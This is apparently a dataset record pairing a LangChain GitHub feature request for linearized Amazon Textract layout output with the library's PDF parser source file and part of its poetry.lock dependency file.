Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints.
Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call
### Motivation
Improve downstream LLM accuracy
### Your contribution
I'll submit a PR for this feature. | https://github.com/langchain-ai/langchain/issues/12068 | https://github.com/langchain-ai/langchain/pull/12446 | a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445 | 0c7f1d8b219e87e3ffd14a15a452622c532c7e95 | "2023-10-20T08:28:07Z" | python | "2023-10-31T01:02:10Z" | libs/langchain/langchain/document_loaders/parsers/pdf.py | """Module contains common parsers for PDFs."""
from __future__ import annotations
import warnings
from typing import (
TYPE_CHECKING,
Any,
Iterable,
Iterator,
Mapping,
Optional,
Sequence,
Union,
)
from urllib.parse import urlparse
import numpy as np
from langchain.document_loaders.base import BaseBlobParser
from langchain.document_loaders.blob_loaders import Blob
from langchain.schema import Document
if TYPE_CHECKING:
import fitz.fitz
import pdfminer.layout
import pdfplumber.page
import pypdf._page
import pypdfium2._helpers.page
_PDF_FILTER_WITH_LOSS = ["DCTDecode", "DCT", "JPXDecode"]
_PDF_FILTER_WITHOUT_LOSS = [
"LZWDecode",
"LZW",
"FlateDecode",
"Fl",
"ASCII85Decode",
"A85",
"ASCIIHexDecode",
"AHx",
"RunLengthDecode",
"RL",
"CCITTFaxDecode",
"CCF",
"JBIG2Decode",
]
def extract_from_images_with_rapidocr(
images: Sequence[Union[Iterable[np.ndarray], bytes]]
) -> str:
"""Extract text from images with RapidOCR.
Args:
images: Images to extract text from.
Returns:
Text extracted from images.
Raises:
ImportError: If `rapidocr-onnxruntime` package is not installed.
"""
try:
from rapidocr_onnxruntime import RapidOCR
except ImportError:
raise ImportError(
"`rapidocr-onnxruntime` package not found, please install it with "
"`pip install rapidocr-onnxruntime`"
)
ocr = RapidOCR()
text = ""
for img in images:
result, _ = ocr(img)
if result:
result = [text[1] for text in result]
text += "\n".join(result)
return text
class PyPDFParser(BaseBlobParser):
"""Load `PDF` using `pypdf`"""
def __init__(
self, password: Optional[Union[str, bytes]] = None, extract_images: bool = False
):
self.password = password
self.extract_images = extract_images
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Lazily parse the blob."""
import pypdf
with blob.as_bytes_io() as pdf_file_obj:
pdf_reader = pypdf.PdfReader(pdf_file_obj, password=self.password)
yield from [
Document(
page_content=page.extract_text()
+ self._extract_images_from_page(page),
metadata={"source": blob.source, "page": page_number},
)
for page_number, page in enumerate(pdf_reader.pages)
]
def _extract_images_from_page(self, page: pypdf._page.PageObject) -> str:
"""Extract images from page and get the text with RapidOCR."""
if not self.extract_images or "/XObject" not in page["/Resources"].keys():
return ""
xObject = page["/Resources"]["/XObject"].get_object()
images = []
for obj in xObject:
if xObject[obj]["/Subtype"] == "/Image":
if xObject[obj]["/Filter"][1:] in _PDF_FILTER_WITHOUT_LOSS:
height, width = xObject[obj]["/Height"], xObject[obj]["/Width"]
images.append(
np.frombuffer(xObject[obj].get_data(), dtype=np.uint8).reshape(
height, width, -1
)
)
elif xObject[obj]["/Filter"][1:] in _PDF_FILTER_WITH_LOSS:
images.append(xObject[obj].get_data())
else:
warnings.warn("Unknown PDF Filter!")
return extract_from_images_with_rapidocr(images)
class PDFMinerParser(BaseBlobParser):
"""Parse `PDF` using `PDFMiner`."""
def __init__(self, extract_images: bool = False):
self.extract_images = extract_images
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Lazily parse the blob."""
if not self.extract_images:
from pdfminer.high_level import extract_text
with blob.as_bytes_io() as pdf_file_obj:
text = extract_text(pdf_file_obj)
metadata = {"source": blob.source}
yield Document(page_content=text, metadata=metadata)
else:
import io
from pdfminer.converter import PDFPageAggregator, TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfinterp import PDFPageInterpreter, PDFResourceManager
from pdfminer.pdfpage import PDFPage
text_io = io.StringIO()
with blob.as_bytes_io() as pdf_file_obj:
pages = PDFPage.get_pages(pdf_file_obj)
rsrcmgr = PDFResourceManager()
device_for_text = TextConverter(rsrcmgr, text_io, laparams=LAParams())
device_for_image = PDFPageAggregator(rsrcmgr, laparams=LAParams())
interpreter_for_text = PDFPageInterpreter(rsrcmgr, device_for_text)
interpreter_for_image = PDFPageInterpreter(rsrcmgr, device_for_image)
for i, page in enumerate(pages):
interpreter_for_text.process_page(page)
interpreter_for_image.process_page(page)
content = text_io.getvalue() + self._extract_images_from_page(
device_for_image.get_result()
)
text_io.truncate(0)
text_io.seek(0)
metadata = {"source": blob.source, "page": str(i)}
yield Document(page_content=content, metadata=metadata)
def _extract_images_from_page(self, page: pdfminer.layout.LTPage) -> str:
"""Extract images from page and get the text with RapidOCR."""
import pdfminer
def get_image(layout_object: Any) -> Any:
if isinstance(layout_object, pdfminer.layout.LTImage):
return layout_object
if isinstance(layout_object, pdfminer.layout.LTContainer):
for child in layout_object:
return get_image(child)
else:
return None
images = []
for img in list(filter(bool, map(get_image, page))):
if img.stream["Filter"].name in _PDF_FILTER_WITHOUT_LOSS:
images.append(
np.frombuffer(img.stream.get_data(), dtype=np.uint8).reshape(
img.stream["Height"], img.stream["Width"], -1
)
)
elif img.stream["Filter"].name in _PDF_FILTER_WITH_LOSS:
images.append(img.stream.get_data())
else:
warnings.warn("Unknown PDF Filter!")
return extract_from_images_with_rapidocr(images)
class PyMuPDFParser(BaseBlobParser):
"""Parse `PDF` using `PyMuPDF`."""
def __init__(
self,
text_kwargs: Optional[Mapping[str, Any]] = None,
extract_images: bool = False,
) -> None:
"""Initialize the parser.
Args:
text_kwargs: Keyword arguments to pass to ``fitz.Page.get_text()``.
"""
self.text_kwargs = text_kwargs or {}
self.extract_images = extract_images
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Lazily parse the blob."""
import fitz
with blob.as_bytes_io() as file_path:
doc = fitz.open(file_path) # open document
yield from [
Document(
page_content=page.get_text(**self.text_kwargs)
+ self._extract_images_from_page(doc, page),
metadata=dict(
{
"source": blob.source,
"file_path": blob.source,
"page": page.number,
"total_pages": len(doc),
},
**{
k: doc.metadata[k]
for k in doc.metadata
if type(doc.metadata[k]) in [str, int]
},
),
)
for page in doc
]
def _extract_images_from_page(
self, doc: fitz.fitz.Document, page: fitz.fitz.Page
) -> str:
"""Extract images from page and get the text with RapidOCR."""
if not self.extract_images:
return ""
import fitz
img_list = page.get_images()
imgs = []
for img in img_list:
xref = img[0]
pix = fitz.Pixmap(doc, xref)
imgs.append(
np.frombuffer(pix.samples, dtype=np.uint8).reshape(
pix.height, pix.width, -1
)
)
return extract_from_images_with_rapidocr(imgs)
class PyPDFium2Parser(BaseBlobParser):
"""Parse `PDF` with `PyPDFium2`."""
def __init__(self, extract_images: bool = False) -> None:
"""Initialize the parser."""
try:
import pypdfium2 # noqa:F401
except ImportError:
raise ImportError(
"pypdfium2 package not found, please install it with"
" `pip install pypdfium2`"
)
self.extract_images = extract_images
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Lazily parse the blob."""
import pypdfium2
# pypdfium2 is really finicky with respect to closing things,
# if done incorrectly creates seg faults.
with blob.as_bytes_io() as file_path:
pdf_reader = pypdfium2.PdfDocument(file_path, autoclose=True)
try:
for page_number, page in enumerate(pdf_reader):
text_page = page.get_textpage()
content = text_page.get_text_range()
text_page.close()
content += "\n" + self._extract_images_from_page(page)
page.close()
metadata = {"source": blob.source, "page": page_number}
yield Document(page_content=content, metadata=metadata)
finally:
pdf_reader.close()
def _extract_images_from_page(self, page: pypdfium2._helpers.page.PdfPage) -> str:
"""Extract images from page and get the text with RapidOCR."""
if not self.extract_images:
return ""
import pypdfium2.raw as pdfium_c
images = list(page.get_objects(filter=(pdfium_c.FPDF_PAGEOBJ_IMAGE,)))
images = list(map(lambda x: x.get_bitmap().to_numpy(), images))
return extract_from_images_with_rapidocr(images)
class PDFPlumberParser(BaseBlobParser):
"""Parse `PDF` with `PDFPlumber`."""
def __init__(
self,
text_kwargs: Optional[Mapping[str, Any]] = None,
dedupe: bool = False,
extract_images: bool = False,
) -> None:
"""Initialize the parser.
Args:
text_kwargs: Keyword arguments to pass to ``pdfplumber.Page.extract_text()``
dedupe: Avoiding the error of duplicate characters if `dedupe=True`.
"""
self.text_kwargs = text_kwargs or {}
self.dedupe = dedupe
self.extract_images = extract_images
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Lazily parse the blob."""
import pdfplumber
with blob.as_bytes_io() as file_path:
doc = pdfplumber.open(file_path) # open document
yield from [
Document(
page_content=self._process_page_content(page)
+ "\n"
+ self._extract_images_from_page(page),
metadata=dict(
{
"source": blob.source,
"file_path": blob.source,
"page": page.page_number - 1,
"total_pages": len(doc.pages),
},
**{
k: doc.metadata[k]
for k in doc.metadata
if type(doc.metadata[k]) in [str, int]
},
),
)
for page in doc.pages
]
def _process_page_content(self, page: pdfplumber.page.Page) -> str:
"""Process the page content based on dedupe."""
if self.dedupe:
return page.dedupe_chars().extract_text(**self.text_kwargs)
return page.extract_text(**self.text_kwargs)
def _extract_images_from_page(self, page: pdfplumber.page.Page) -> str:
"""Extract images from page and get the text with RapidOCR."""
if not self.extract_images:
return ""
images = []
for img in page.images:
if img["stream"]["Filter"].name in _PDF_FILTER_WITHOUT_LOSS:
images.append(
np.frombuffer(img["stream"].get_data(), dtype=np.uint8).reshape(
img["stream"]["Height"], img["stream"]["Width"], -1
)
)
elif img["stream"]["Filter"].name in _PDF_FILTER_WITH_LOSS:
images.append(img["stream"].get_data())
else:
warnings.warn("Unknown PDF Filter!")
return extract_from_images_with_rapidocr(images)
class AmazonTextractPDFParser(BaseBlobParser):
"""Send `PDF` files to `Amazon Textract` and parse them.
For parsing multi-page PDFs, they have to reside on S3.
"""
def __init__(
self,
textract_features: Optional[Sequence[int]] = None,
client: Optional[Any] = None,
) -> None:
"""Initializes the parser.
Args:
textract_features: Features to be used for extraction, each feature
should be passed as an int that conforms to the enum
`Textract_Features`, see `amazon-textract-caller` pkg
client: boto3 textract client
"""
try:
import textractcaller as tc
self.tc = tc
if textract_features is not None:
self.textract_features = [
tc.Textract_Features(f) for f in textract_features
]
else:
self.textract_features = []
except ImportError:
raise ImportError(
"Could not import amazon-textract-caller python package. "
"Please install it with `pip install amazon-textract-caller`."
)
if not client:
try:
import boto3
self.boto3_textract_client = boto3.client("textract")
except ImportError:
raise ImportError(
"Could not import boto3 python package. "
"Please install it with `pip install boto3`."
)
else:
self.boto3_textract_client = client
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Iterates over the Blob pages and returns an Iterator with a Document
for each page, like the other parsers If multi-page document, blob.path
has to be set to the S3 URI and for single page docs the blob.data is taken
"""
url_parse_result = urlparse(str(blob.path)) if blob.path else None
# Either call with S3 path (multi-page) or with bytes (single-page)
if (
url_parse_result
and url_parse_result.scheme == "s3"
and url_parse_result.netloc
):
textract_response_json = self.tc.call_textract(
input_document=str(blob.path),
features=self.textract_features,
boto3_textract_client=self.boto3_textract_client,
)
else:
textract_response_json = self.tc.call_textract(
input_document=blob.as_bytes(),
features=self.textract_features,
call_mode=self.tc.Textract_Call_Mode.FORCE_SYNC,
boto3_textract_client=self.boto3_textract_client,
)
current_text = ""
current_page = 1
for block in textract_response_json["Blocks"]:
if "Page" in block and not (int(block["Page"]) == current_page):
yield Document(
page_content=current_text,
metadata={"source": blob.source, "page": current_page},
)
current_text = ""
current_page = int(block["Page"])
if "Text" in block:
current_text += block["Text"] + " "
yield Document(
page_content=current_text,
metadata={"source": blob.source, "page": current_page},
)
class DocumentIntelligenceParser(BaseBlobParser):
"""Loads a PDF with Azure Document Intelligence
(formerly Forms Recognizer) and chunks at character level."""
def __init__(self, client: Any, model: str):
self.client = client
self.model = model
def _generate_docs(self, blob: Blob, result: Any) -> Iterator[Document]:
for p in result.pages:
content = " ".join([line.content for line in p.lines])
d = Document(
page_content=content,
metadata={
"source": blob.source,
"page": p.page_number,
},
)
yield d
def lazy_parse(self, blob: Blob) -> Iterator[Document]:
"""Lazily parse the blob."""
with blob.as_bytes_io() as file_obj:
poller = self.client.begin_analyze_document(self.model, file_obj)
result = poller.result()
docs = self._generate_docs(blob, result)
yield from docs
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 12,068 | feat: Add Linearized output to Textract PDFLoader | ### Feature request
Textract released the [LAYOUT](https://docs.aws.amazon.com/textract/latest/dg/layoutresponse.html) feature, which identifies different layout elements like tables, lists, figures, text-paragraphs and titles. This should be used by the AmazonTextractPDFParser to generate a linearized output to improve downstream LLMs accuracy with those hints.
Text output should render tables and key/value pairs and text in reading order for multi-column text and prefix lists with a *, when features like LAYOUT, TABLES, FORMS are passed to the textract call
### Motivation
Improve downstream LLM accuracy
### Your contribution
I'll submit a PR for this feature. | https://github.com/langchain-ai/langchain/issues/12068 | https://github.com/langchain-ai/langchain/pull/12446 | a7d5e0ce8a30bd81b8f7b544a4859c31d5f25445 | 0c7f1d8b219e87e3ffd14a15a452622c532c7e95 | "2023-10-20T08:28:07Z" | python | "2023-10-31T01:02:10Z" | libs/langchain/poetry.lock | # This file is automatically @generated by Poetry 1.6.1 and should not be changed by hand.
[[package]]
name = "absl-py"
version = "2.0.0"
description = "Abseil Python Common Libraries, see https://github.com/abseil/abseil-py."
optional = true
python-versions = ">=3.7"
files = [
{file = "absl-py-2.0.0.tar.gz", hash = "sha256:d9690211c5fcfefcdd1a45470ac2b5c5acd45241c3af71eed96bc5441746c0d5"},
{file = "absl_py-2.0.0-py3-none-any.whl", hash = "sha256:9a28abb62774ae4e8edbe2dd4c49ffcd45a6a848952a5eccc6a49f3f0fc1e2f3"},
]
[[package]]
name = "aioboto3"
version = "12.0.0"
description = "Async boto3 wrapper"
optional = true
python-versions = ">=3.8,<4.0"
files = [
{file = "aioboto3-12.0.0-py3-none-any.whl", hash = "sha256:23895e734f83e34827a38d3a08ccc3f4178cc8d4e3a7b7031a0cbf8efc875555"},
{file = "aioboto3-12.0.0.tar.gz", hash = "sha256:c2bbb990b4efd2e474a1e8a42a80291faf6434b2dc8678f163208d338b2dba39"},
]
[package.dependencies]
aiobotocore = {version = "2.7.0", extras = ["boto3"]}
[package.extras]
chalice = ["chalice (>=1.24.0)"]
s3cse = ["cryptography (>=2.3.1)"]
[[package]]
name = "aiobotocore"
version = "2.7.0"
description = "Async client for aws services using botocore and aiohttp"
optional = true
python-versions = ">=3.8"
files = [
{file = "aiobotocore-2.7.0-py3-none-any.whl", hash = "sha256:aec605df77ce4635a0479b50fd849aa6b640900f7b295021ecca192e1140e551"},
{file = "aiobotocore-2.7.0.tar.gz", hash = "sha256:506591374cc0aee1bdf0ebe290560424a24af176dfe2ea7057fe1df97c4f0467"},
]
[package.dependencies]
aiohttp = ">=3.7.4.post0,<4.0.0"
aioitertools = ">=0.5.1,<1.0.0"
boto3 = {version = ">=1.28.16,<1.28.65", optional = true, markers = "extra == \"boto3\""}
botocore = ">=1.31.16,<1.31.65"
wrapt = ">=1.10.10,<2.0.0"
[package.extras]
awscli = ["awscli (>=1.29.16,<1.29.65)"]
boto3 = ["boto3 (>=1.28.16,<1.28.65)"]
[[package]]
name = "aiodns"
version = "3.1.1"
description = "Simple DNS resolver for asyncio"
optional = true
python-versions = "*"
files = [
{file = "aiodns-3.1.1-py3-none-any.whl", hash = "sha256:a387b63da4ced6aad35b1dda2d09620ad608a1c7c0fb71efa07ebb4cd511928d"},
{file = "aiodns-3.1.1.tar.gz", hash = "sha256:1073eac48185f7a4150cad7f96a5192d6911f12b4fb894de80a088508c9b3a99"},
]
[package.dependencies]
pycares = ">=4.0.0"
[[package]]
name = "aiofiles"
version = "23.2.1"
description = "File support for asyncio."
optional = true
python-versions = ">=3.7"
files = [
{file = "aiofiles-23.2.1-py3-none-any.whl", hash = "sha256:19297512c647d4b27a2cf7c34caa7e405c0d60b5560618a29a9fe027b18b0107"},
{file = "aiofiles-23.2.1.tar.gz", hash = "sha256:84ec2218d8419404abcb9f0c02df3f34c6e0a68ed41072acfb1cef5cbc29051a"},
]
[[package]]
name = "aiohttp"
version = "3.8.6"
description = "Async http client/server framework (asyncio)"
optional = false
python-versions = ">=3.6"
files = [
{file = "aiohttp-3.8.6-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:41d55fc043954cddbbd82503d9cc3f4814a40bcef30b3569bc7b5e34130718c1"},
{file = "aiohttp-3.8.6-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:1d84166673694841d8953f0a8d0c90e1087739d24632fe86b1a08819168b4566"},
{file = "aiohttp-3.8.6-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:253bf92b744b3170eb4c4ca2fa58f9c4b87aeb1df42f71d4e78815e6e8b73c9e"},
{file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3fd194939b1f764d6bb05490987bfe104287bbf51b8d862261ccf66f48fb4096"},
{file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:6c5f938d199a6fdbdc10bbb9447496561c3a9a565b43be564648d81e1102ac22"},
{file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:2817b2f66ca82ee699acd90e05c95e79bbf1dc986abb62b61ec8aaf851e81c93"},
{file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0fa375b3d34e71ccccf172cab401cd94a72de7a8cc01847a7b3386204093bb47"},
{file = "aiohttp-3.8.6-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9de50a199b7710fa2904be5a4a9b51af587ab24c8e540a7243ab737b45844543"},
{file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:e1d8cb0b56b3587c5c01de3bf2f600f186da7e7b5f7353d1bf26a8ddca57f965"},
{file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:8e31e9db1bee8b4f407b77fd2507337a0a80665ad7b6c749d08df595d88f1cf5"},
{file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:7bc88fc494b1f0311d67f29fee6fd636606f4697e8cc793a2d912ac5b19aa38d"},
{file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_s390x.whl", hash = "sha256:ec00c3305788e04bf6d29d42e504560e159ccaf0be30c09203b468a6c1ccd3b2"},
{file = "aiohttp-3.8.6-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:ad1407db8f2f49329729564f71685557157bfa42b48f4b93e53721a16eb813ed"},
{file = "aiohttp-3.8.6-cp310-cp310-win32.whl", hash = "sha256:ccc360e87341ad47c777f5723f68adbb52b37ab450c8bc3ca9ca1f3e849e5fe2"},
{file = "aiohttp-3.8.6-cp310-cp310-win_amd64.whl", hash = "sha256:93c15c8e48e5e7b89d5cb4613479d144fda8344e2d886cf694fd36db4cc86865"},
{file = "aiohttp-3.8.6-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:6e2f9cc8e5328f829f6e1fb74a0a3a939b14e67e80832975e01929e320386b34"},
{file = "aiohttp-3.8.6-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:e6a00ffcc173e765e200ceefb06399ba09c06db97f401f920513a10c803604ca"},
{file = "aiohttp-3.8.6-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:41bdc2ba359032e36c0e9de5a3bd00d6fb7ea558a6ce6b70acedf0da86458321"},
{file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:14cd52ccf40006c7a6cd34a0f8663734e5363fd981807173faf3a017e202fec9"},
{file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2d5b785c792802e7b275c420d84f3397668e9d49ab1cb52bd916b3b3ffcf09ad"},
{file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:1bed815f3dc3d915c5c1e556c397c8667826fbc1b935d95b0ad680787896a358"},
{file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:96603a562b546632441926cd1293cfcb5b69f0b4159e6077f7c7dbdfb686af4d"},
{file = "aiohttp-3.8.6-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:d76e8b13161a202d14c9584590c4df4d068c9567c99506497bdd67eaedf36403"},
{file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:e3f1e3f1a1751bb62b4a1b7f4e435afcdade6c17a4fd9b9d43607cebd242924a"},
{file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:76b36b3124f0223903609944a3c8bf28a599b2cc0ce0be60b45211c8e9be97f8"},
{file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:a2ece4af1f3c967a4390c284797ab595a9f1bc1130ef8b01828915a05a6ae684"},
{file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_s390x.whl", hash = "sha256:16d330b3b9db87c3883e565340d292638a878236418b23cc8b9b11a054aaa887"},
{file = "aiohttp-3.8.6-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:42c89579f82e49db436b69c938ab3e1559e5a4409eb8639eb4143989bc390f2f"},
{file = "aiohttp-3.8.6-cp311-cp311-win32.whl", hash = "sha256:efd2fcf7e7b9d7ab16e6b7d54205beded0a9c8566cb30f09c1abe42b4e22bdcb"},
{file = "aiohttp-3.8.6-cp311-cp311-win_amd64.whl", hash = "sha256:3b2ab182fc28e7a81f6c70bfbd829045d9480063f5ab06f6e601a3eddbbd49a0"},
{file = "aiohttp-3.8.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:fdee8405931b0615220e5ddf8cd7edd8592c606a8e4ca2a00704883c396e4479"},
{file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d25036d161c4fe2225d1abff2bd52c34ed0b1099f02c208cd34d8c05729882f0"},
{file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:5d791245a894be071d5ab04bbb4850534261a7d4fd363b094a7b9963e8cdbd31"},
{file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:0cccd1de239afa866e4ce5c789b3032442f19c261c7d8a01183fd956b1935349"},
{file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:1f13f60d78224f0dace220d8ab4ef1dbc37115eeeab8c06804fec11bec2bbd07"},
{file = "aiohttp-3.8.6-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8a9b5a0606faca4f6cc0d338359d6fa137104c337f489cd135bb7fbdbccb1e39"},
{file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:13da35c9ceb847732bf5c6c5781dcf4780e14392e5d3b3c689f6d22f8e15ae31"},
{file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:4d4cbe4ffa9d05f46a28252efc5941e0462792930caa370a6efaf491f412bc66"},
{file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_ppc64le.whl", hash = "sha256:229852e147f44da0241954fc6cb910ba074e597f06789c867cb7fb0621e0ba7a"},
{file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_s390x.whl", hash = "sha256:713103a8bdde61d13490adf47171a1039fd880113981e55401a0f7b42c37d071"},
{file = "aiohttp-3.8.6-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:45ad816b2c8e3b60b510f30dbd37fe74fd4a772248a52bb021f6fd65dff809b6"},
{file = "aiohttp-3.8.6-cp36-cp36m-win32.whl", hash = "sha256:2b8d4e166e600dcfbff51919c7a3789ff6ca8b3ecce16e1d9c96d95dd569eb4c"},
{file = "aiohttp-3.8.6-cp36-cp36m-win_amd64.whl", hash = "sha256:0912ed87fee967940aacc5306d3aa8ba3a459fcd12add0b407081fbefc931e53"},
{file = "aiohttp-3.8.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:e2a988a0c673c2e12084f5e6ba3392d76c75ddb8ebc6c7e9ead68248101cd446"},
{file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:ebf3fd9f141700b510d4b190094db0ce37ac6361a6806c153c161dc6c041ccda"},
{file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:3161ce82ab85acd267c8f4b14aa226047a6bee1e4e6adb74b798bd42c6ae1f80"},
{file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:d95fc1bf33a9a81469aa760617b5971331cdd74370d1214f0b3109272c0e1e3c"},
{file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6c43ecfef7deaf0617cee936836518e7424ee12cb709883f2c9a1adda63cc460"},
{file = "aiohttp-3.8.6-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:ca80e1b90a05a4f476547f904992ae81eda5c2c85c66ee4195bb8f9c5fb47f28"},
{file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:90c72ebb7cb3a08a7f40061079817133f502a160561d0675b0a6adf231382c92"},
{file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:bb54c54510e47a8c7c8e63454a6acc817519337b2b78606c4e840871a3e15349"},
{file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:de6a1c9f6803b90e20869e6b99c2c18cef5cc691363954c93cb9adeb26d9f3ae"},
{file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_s390x.whl", hash = "sha256:a3628b6c7b880b181a3ae0a0683698513874df63783fd89de99b7b7539e3e8a8"},
{file = "aiohttp-3.8.6-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:fc37e9aef10a696a5a4474802930079ccfc14d9f9c10b4662169671ff034b7df"},
{file = "aiohttp-3.8.6-cp37-cp37m-win32.whl", hash = "sha256:f8ef51e459eb2ad8e7a66c1d6440c808485840ad55ecc3cafefadea47d1b1ba2"},
{file = "aiohttp-3.8.6-cp37-cp37m-win_amd64.whl", hash = "sha256:b2fe42e523be344124c6c8ef32a011444e869dc5f883c591ed87f84339de5976"},
{file = "aiohttp-3.8.6-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:9e2ee0ac5a1f5c7dd3197de309adfb99ac4617ff02b0603fd1e65b07dc772e4b"},
{file = "aiohttp-3.8.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:01770d8c04bd8db568abb636c1fdd4f7140b284b8b3e0b4584f070180c1e5c62"},
{file = "aiohttp-3.8.6-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:3c68330a59506254b556b99a91857428cab98b2f84061260a67865f7f52899f5"},
{file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:89341b2c19fb5eac30c341133ae2cc3544d40d9b1892749cdd25892bbc6ac951"},
{file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:71783b0b6455ac8f34b5ec99d83e686892c50498d5d00b8e56d47f41b38fbe04"},
{file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_s390x.manylinux2014_s390x.whl", hash = "sha256:f628dbf3c91e12f4d6c8b3f092069567d8eb17814aebba3d7d60c149391aee3a"},
{file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b04691bc6601ef47c88f0255043df6f570ada1a9ebef99c34bd0b72866c217ae"},
{file = "aiohttp-3.8.6-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:7ee912f7e78287516df155f69da575a0ba33b02dd7c1d6614dbc9463f43066e3"},
{file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:9c19b26acdd08dd239e0d3669a3dddafd600902e37881f13fbd8a53943079dbc"},
{file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:99c5ac4ad492b4a19fc132306cd57075c28446ec2ed970973bbf036bcda1bcc6"},
{file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:f0f03211fd14a6a0aed2997d4b1c013d49fb7b50eeb9ffdf5e51f23cfe2c77fa"},
{file = "aiohttp-3.8.6-cp38-cp38-musllinux_1_1_s390x.whl", hash = "sha256:8d399dade330c53b4106160f75f55407e9ae7505263ea86f2ccca6bfcbdb4921"},
